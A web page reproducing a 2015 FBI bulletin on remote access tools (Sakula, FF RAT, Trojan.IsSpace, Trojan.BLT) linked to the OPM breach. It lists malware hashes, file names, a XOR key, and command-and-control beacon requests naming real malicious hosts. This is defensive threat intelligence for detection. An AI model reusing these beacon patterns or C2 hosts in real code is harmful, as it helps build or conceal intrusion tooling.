FBI Cyber Division Bulletin on Tools Reportedly Used by OPM Hackers

The following bulletin was released to private industry partners June 5, 2015.  According to an article from Reuters, one of the remote access tools (RAT) described in the bulletin, called Sakula, is directly linked to the hack of the Office of Personnel Management (OPM) that was disclosed earlier this month.  Other publications have directly linked the bulletin to the OPM hack, though have not made the bulletin available publicly.

FBI-HackToolsOPM

FBI Cyber Division

  • 7 pages
  • TLP: GREEN
  • June 5, 2015

Download

The FBI is providing the following information with HIGH confidence:

The FBI has obtained information regarding cyber actors who have compromised and stolen sensitive business information and Personally Identifiable Information (PII). Information obtained from victims indicates that PII was a priority target. The FBI notes that stolen PII has been used in other instances to target or otherwise facilitate various malicious activities such as financial fraud though the FBI is not aware of such activity by these groups. Any activity related to these groups detected on a network should be considered an indication of a compromise requiring extensive mitigation and contact with law enforcement.

Technical Details

The FBI is providing the following information with HIGH confidence:

Groups responsible for these activities have been observed across a variety of intrusions leveraging a diverse selection of tools and techniques to attempt to gain initial access to a victim including using credentials acquired during previous intrusions. These groups have also been observed compromising using the technique of DNS hijacking facilitated through the compromise of DNS registrars.

Following such an exploit, such groups have been observed recently using custom Remote Access Tools (RAT).

Sakula- A RAT that has the capabilities to launch remote command shells, enumerate processes, download files, and beacon to Command and Control (C2) domains. Sakula attempts to send a two-beacon set over TCP port 80 to a configured domain. If the domain is unavailable, it will attempt to connect to a secondary domain over TCP port 80 and 443 using HTTP.

Specific Sakula MD5 hash values are attached in the accompanying Excel spreadsheet.

Beaconing

POST /script.asp?imageid=ivpgvz2085205250&type=0&resid=93863828&nmsg=up HTTP/1.1
Accept: */*
User-Agent: iexplorer
Host: [varies]
Content-Length: 173
Cache-Control: no-cache

GET /photo/ivpgvz2085205250.jpg?resid=93864218 HTTP/1.1
User-Agent: iexplorer
Host: [varies]
Cache-Control: no-cache

The following are example POST and GET requests to the secondary C2 domain

GET /newimage.asp?imageid=
POST /view.asp?cstring=
POST /view.asp?cstring=%s&tom=0&id=
POST /script.asp?imageid=
GET /photo/%s.jpg?id=%d
POST /viewpre.asp?cstring=
User-Agent: HttpDump 1.1

POST /script.asp?imageid=ivpgvz2085205250&type=0&resid=100391156&nmsg=up HTTP/1.1
Accept: */*
User-Agent: iexplorer
Host: [varies]
Content-Length: 173
Cache-Control: no-cache

GET /photo/ivpgvz2085205250.jpg?resid=100391156 HTTP/1.1
User-Agent: iexplorer
Host: [varies]

FF RAT- a RAT that has the capabilities to download Trojan DLL files to memory and beacon back to C2 domains and was named based on the unique string “FF-RAT USER” found within the malware. The data sent in the beacon is XOR-encoded using the key 0x27.

Trojan.IsSpace – a RAT that contains multiple files that include a dropper (EWSNH.exe), Trojan (AOFVPMJXVT.exe), privilege escalation tool (SensrSvc2013.exe), and a module used by the tool (SensrSvc2013.dll). This malware is capable of bypassing dyndns categorization by using a proxy through Google AppProxy’s hosted on appspot domains.

Filename: EWSNH.exe
MD5: bfdbf09072b58e90aef726c2d1ecf8b7
File Size (bytes): 1990136

Filename: AOFVPMJXVT.exe
MD5: 25631f5ccec8f155a8760b8568ca22c5
File Size (bytes): 63488

Filename: SensrSvc2013.exe
MD5: 38f29e955b76de69c8e97f4491202b8b
File Size (bytes): 197120

Filename: <VARIES>.tmp / SensrSvc2013.dll / CRYPTBASE.dll
MD5: 75416711fc782a3e2a2b54c4b86677bf
File Size (bytes): 42496

Protocol variations in the URI:

SSports.asp?
HostID=
SWeather.asp?
HostID=
&PackNo=
SJobs.asp?HostID=
STravel.asp?HostID=
SGames.asp?
HostID=
SNews.asp?HostID=
STTip.asp

Trojan.BLT- a RAT that is executed from its export CreateInstance, the mutex HFRM_ is created and a process instance of cmd.exe is launched to execute the command “ipconfig/all” to collect the victim system’s MAC address. Trojan.BLT will test network connectivity by establishing a connection with a legitimate website. This malware is capable of bypassing dyndns categorization by using a proxy through Google AppProxy’s hosted on appspot domains.

Trojan.BLT will validate the connection by checking the HTTP header “Service:IIS”. Trojan.BLT will then conduct further C2 activity.

Beaconing:

POST /fetch.py HTTP/1.1
Accept: */*
Cache-Control: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: snecma-secure.appspot.com
Content-Length: 56
Connection: Close

POST /asp/STTip.asp HTTP/1.1
Accept: */*
Cache-Control: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: facebook.from-pr.com
Content-Length: 11
Connection: Close

GET / HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 7.0;Windows NT 5.1)
Host: www.microsoft.com
Cache-Control: no-cache

Share this:

Facebooktwitterredditlinkedinmail